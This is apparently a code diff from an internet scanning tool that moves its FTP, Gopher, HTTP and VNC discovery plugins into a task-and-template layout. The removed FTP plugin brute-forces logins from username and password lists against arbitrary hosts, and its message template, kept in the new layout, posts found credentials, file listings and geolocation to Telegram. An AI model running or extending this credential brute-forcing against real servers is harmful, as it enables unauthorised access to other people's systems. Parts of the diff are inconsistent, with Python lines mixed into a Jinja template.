item['data']['files'].append(node)
if not item['data']['files']:
raise Exception("Empty server (not Gopher?)")
return True


@ -0,0 +1,60 @@
from lib.exec import Task
from io import BytesIO
import json
import time
import bs4
import requests
import urllib3
from PIL import Image
from bson.binary import Binary
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.proxy import Proxy, ProxyType
import zlib
import netaddr
class HTTPFindTask(Task):
def __init__(self, id, root):
super().__init__(id, root)
def _process(self, item):
urllib3.disable_warnings()
response = requests.get(url='http://%s:%s/' % (self._host['ip'], self._host['port']),
timeout=cnf.stalker.HTTP.timeout,
verify=False)
if response.status_code in [400, 401, 403, 500]:
raise self.PipelineError("Bad response")
self._host['data']['response'] = {}
self._host['data']['response']['code'] = response.status_code
self._host['data']['response']['text'] = response.text
self._host['data']['response']['content'] = response.content
self._host['data']['response']['encoding'] = response.encoding
self._host['data']['response']['headers'] = response.headers
encoding = response.encoding if 'charset' in response.headers.get('content-type', '').lower() else None
soup = bs4.BeautifulSoup(response.content, "html.parser", from_encoding=encoding)
if soup.original_encoding != 'utf-8':
meta = soup.select_one('meta[charset], meta[http-equiv="Content-Type"]')
if meta:
if 'charset' in meta.attrs:
meta['charset'] = 'utf-8'
else:
meta['content'] = 'text/html; charset=utf-8'
self._host['data']['response']['text'] = soup.prettify() # encodes to UTF-8 by default
title = soup.select_one('title')
if title:
if title.string:
title = title.string
else:
title = ""
else:
title = ""
self._host['data']['title'] = title


@ -0,0 +1,10 @@
import tempfile
from lib.exec import Task
class VNCFindTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect FTP service with various credentials"""
def _process(self, item):
fd, temp_path = tempfile.mkstemp()
print(fd, temp_path)


@ -0,0 +1,6 @@
ftp://{{data['username']}}:{{data['password']}}@{{data['ip']}}
{% for filename in data['files'] -%}
+ {{ filename }}
{% endfor -%}
Geo: {{data['geo']['country']}}/{{data['geo']['city']}}


@ -0,0 +1,15 @@
gopher://{{data['ip']}}/
Dirs:
{% for node in data['files'] -%}
{% if node['type'] == '1' -%}
+ {{node['path']}}
{% endif -%}
{% endfor -%}
Other nodes:
{% for node in data['files'] -%}
{% if node['type'] != '1' and node['type'] != 'i' -%}
+ {{node['path']}}
{{node['name']}}
{% endif -%}
{% endfor -%}
Geo: {{data['geo']['country']}}/{{data['geo']['city']}}


@ -0,0 +1,19 @@
#code{{data['response']['code']}}
server = self._host['data']['response']['headers'].get('Server', None)
{% if server != none %}
" Server: #%s\n" % server
else:
"\n"
if self._host['data']['title']:
"Title: %s\n" % self._host['data']['title']
"Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
"http://%s:%s/\n" % (self._host['ip'], self._host['port'])
"#http_" + str(int(netaddr.IPAddress(self._host['ip'])))


@ -1,110 +0,0 @@
import ftplib
import netaddr
from Config import cnf
from lib.plugin.plugins import BasePlugin
class Plugin(BasePlugin):
class TelegramMessage(BasePlugin.TelegramMessage):
def _init(self):
self._name = "FTP"
def _generate(self):
self.data['txt'] = "ftp://%s:%s@%s/\n" % \
(self._host['data']['username'], self._host['data']['password'], self._host['ip'])
for filename in self._host['data']['files']:
self.data['txt'] += " + %s\n" % filename
self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
self.data['txt'] += "#ftp_" + str(int(netaddr.IPAddress(self._host['ip'])))
class Pipeline(BasePlugin.Pipeline):
def _init(self):
self._name = "FTP"
def run(self):
try:
self._connect()
self._find()
self._filter()
self._push()
except Exception as e:
self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
else:
self._logger.info("Succeeded for %s" % self._host['ip'])
def _connect(self):
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
try:
self._logger.debug('Trying anonymous login')
self.ftp.login()
except ftplib.error_perm:
pass
else:
self._logger.debug('Succeeded with anonymous')
self._host['data']['username'] = 'anonymous'
self._host['data']['password'] = ''
return
if cnf.stalker.FTP.bruteforce:
usernames = []
passwords = []
with open(cnf.stalker.FTP.logins, 'r') as lfh:
for username in lfh:
usernames.append(username.rstrip())
with open(cnf.stalker.FTP.passwords, 'r') as pfh:
for password in pfh:
passwords.append(password.rstrip())
for username in usernames:
for password in passwords:
try:
self.ftp.voidcmd('NOOP')
except IOError:
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
self._logger.debug('Trying %s' % (username + ':' + password))
try:
self.ftp.login(username, password)
except ftplib.error_perm:
continue
except:
raise
else:
self._logger.debug('Succeeded with %s' %(username + ':' + password))
self._host['data']['username'] = username
self._host['data']['password'] = password
return
raise Exception('No matching credentials found')
def _find(self):
filelist = self.ftp.nlst()
try:
self.ftp.quit()
except:
# that's weird, but we don't care
pass
try:
if len(filelist) == 0 or filelist[0] == "total 0":
raise self.PipelineError("Empty server")
except IndexError:
pass
self._host['data']['files'] = []
for fileName in filelist:
self._host['data']['files'].append(fileName)
def _filter(self):
self._host['data']['filter'] = False
if len(self._host['data']['files']) == 0:
self._host['data']['filter'] = "Empty"
elif len(self._host['data']['files']) < 6:
match = 0
for f in 'incoming', '..', '.ftpquota', '.', 'pub':
if f in self._host['data']['files']:
match += 1
if match == len(self._host['data']['files']):
self._host['data']['filter'] = "EmptyWithSystemDirs"


@ -1,70 +0,0 @@
import socket
import netaddr
from Config import cnf
from lib.plugin.plugins import BasePlugin
class Plugin(BasePlugin):
class TelegramMessage(BasePlugin.TelegramMessage):
def _init(self):
self._name = "Gopher"
def _generate(self):
self.data['txt'] = "gopher://%s/\n" % self._host['ip']
self.data['txt'] += "Dirs:\n"
for dir in [f for f in self._host['data']['files'] if f['type'] == '1']:
self.data['txt'] += " + %s\n" % dir['path']
self.data['txt'] += "Other nodes:\n"
for file in [f for f in self._host['data']['files'] if f['type'] != '1' and f['type'] != 'i']:
self.data['txt'] += " + %s\n %s\n" % (file['path'], file['name'])
self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
self.data['txt'] += "#gopher_" + str(int(netaddr.IPAddress(self._host['ip'])))
class Pipeline(BasePlugin.Pipeline):
def _init(self):
self._name = "Gopher"
def run(self):
try:
self._find()
self._push()
except Exception as e:
self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
else:
self._logger.info("Succeeded for %s" % self._host['ip'])
def _recv(self, sck):
total_data = []
while True:
data = sck.recv(2048)
if not data:
break
total_data.append(data.decode('utf-8'))
return ''.join(total_data)
def _find(self):
sock = socket.socket()
sock.settimeout(cnf.stalker.Gopher.timeout)
sock.connect((self._host['ip'], int(self._host['port'])))
sock.sendall(b'\n\n')
response = self._recv(sock)
sock.close()
self._logger.debug("Parsing result")
self._host['data']['files'] = []
self._host['data']['filter'] = False
for s in [s for s in response.split("\r\n") if s]:
node = {}
fields = s.split("\t")
self._logger.debug(fields)
node['type'] = fields[0][0]
if len(fields) == 4:
node['name'] = fields[0][1:]
node['path'] = fields[1]
node['serv'] = f"{fields[2]}:{fields[3]}"
self._host['data']['files'].append(node)
if not self._host['data']['files']:
raise self.PipelineError("Empty server (not Gopher?)")


@ -1 +0,0 @@
plugins formed in old plugin format


@ -1,45 +0,0 @@
from threading import Thread
from time import sleep
class A: # NOOP
def __init__(self, thread = None):
if thread:
self.__thread = Thread(target=thread)
self._running = False
self._init()
def _init(self):
pass
def start(self):
self._running = True
self.__thread.daemon = True
self.__thread.start()
def stop(self):
self._running = False
self.__thread.join()
def __run(self):
while(self._running):
print('NOOP')
sleep(1)
class B(A): # NOOP
def __init__(self):
super().__init__(self.__run)
def __run(self):
while(self._running):
print('OP')
sleep(1)
class C(A): # NOOP
def __run(self):
while(self._running):
print('OP')
sleep(1)
def _init(self):
self.__thread = Thread(target=self.__run)


@ -1,2 +0,0 @@
#from .scan import scan
#from .stalk import stalk


@ -1,8 +0,0 @@
from lib.plugin import Manager
# legacy
# why legacy?
def worker(host, plugin):
p = Manager.get_plugin(plugin)
p.Plugin.Pipeline(host, plugin)
del p
# cool bro


@ -1,10 +1,10 @@
import logging
import importlib
import sys, os

from Config import cnf as config


class Logger(logging.Logger):
    """Logger. standard logging logger with some shitcode on the top"""
    def __init__(self, name):
@ -74,8 +74,8 @@ class Logger(logging.Logger):
class Loadable:
    """parent for loadable from configuration"""
    def __init__(self, id, root=config):
        self.cnf = config  # global config
        self.lcnf = root[id]  # local config
        self._id = id
@ -95,6 +95,9 @@ class Loader:
        return getattr(result, name)

    @classmethod
    def by_id(cls, section, id) -> Loadable:
        """Returns instantiated object of class provided in configuration"""
        # prepares Loader for certain package
        loader = cls(config.get(section).get(id).get('package'))
        # loads class from this package and returns instantiated object of this class
        return loader.get(config.get(section).get(id).get('service'))(id=id, root=config.get(section))


@ -1,5 +1,4 @@
#!/usr/bin/python3

import time
@ -20,22 +19,24 @@ class Core:
        self._services.append(service)

    def start(self):
        """Starts all loaded services"""
        self.logger.info("Starting")
        for service in self._services:
            service.start()
        self.logger.info("Started")

    def stop(self):
        """Stops all loaded services"""
        self.logger.info("Stopping Core")
        for service in self._services:
            service.stop()
        self.logger.info("Stopped")


if __name__ == '__main__':
    CORE = Core()
    CORE.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        CORE.stop()


@ -12,3 +12,4 @@ zmq
jsoncomment
rq
pyyaml
jinja2